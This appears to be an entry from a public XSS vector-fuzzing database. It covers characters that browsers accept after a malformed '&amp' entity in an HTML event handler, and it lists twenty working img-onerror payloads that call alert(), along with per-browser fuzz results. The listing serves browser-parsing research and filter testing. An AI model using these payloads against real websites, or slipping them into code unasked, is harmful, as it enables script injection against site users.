
Characters allowed after malformed entities

Results per browser: Edge 31, Chrome 31, Safari 31, Firefox 31

This vector shows which characters are allowed after a malformed named entity.

Created by: hackvertor

Created on: Monday, July 1, 2024 at 9:26:08 PM

Updated on: Tuesday, May 27, 2025 at 8:16:09 AM



Category: Entity Parsing

Vector visibility: Public

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="1&amp$[chr]log($[i])">

Sample payloads

<img src=data: onerror="1&amp alert(8199)">
<img src=data: onerror="1&amp+alert(43)">
<img src=data: onerror="1&amp alert(8193)">
<img src=data: onerror="1&amp0x0Balert(11)">
<img src=data: onerror="1&amp alert(8198)">
<img src=data: onerror="1&amp alert(12288)">
<img src=data: onerror="1&ampalert(65279)">
<img src=data: onerror="1&amp alert(8200)">
<img src=data: onerror="1&amp alert(8239)">
<img src=data: onerror="1&amp alert(8196)">
<img src=data: onerror="1&amp!alert(33)">
<img src=data: onerror="1&amp alert(8194)">
<img src=data: onerror="1&amp0x0Calert(12)">
<img src=data: onerror="1&amp alert(5760)">
<img src=data: onerror="1&amp;alert(59)">
<img src=data: onerror="1&amp-alert(45)">
<img src=data: onerror="1&amp0x0Dalert(13)">
<img src=data: onerror="1&amp
alert(8232)">
<img src=data: onerror="1&amp
alert(8233)">
<img src=data: onerror="1&amp alert(8195)">

Fuzz results

Chrome 144.0.0.0 desktop Windows NT 10.0

Updated

Sun Jan 25 2026
Found 31 results
Chrome 126.0.0.0 desktop macOS 10.15.7 (older version)

Updated

Tue Jul 02 2024
Found 31 results
Firefox 127.0 desktop macOS 10.15

Updated

Tue Jul 02 2024
Found 31 results
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0

Updated

Sat Jan 31 2026
Found 31 results
Safari 18.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 31 results
Safari 17.5 mobile iOS 17.5.1 (older version)

Updated

Mon Jul 01 2024
Found 31 results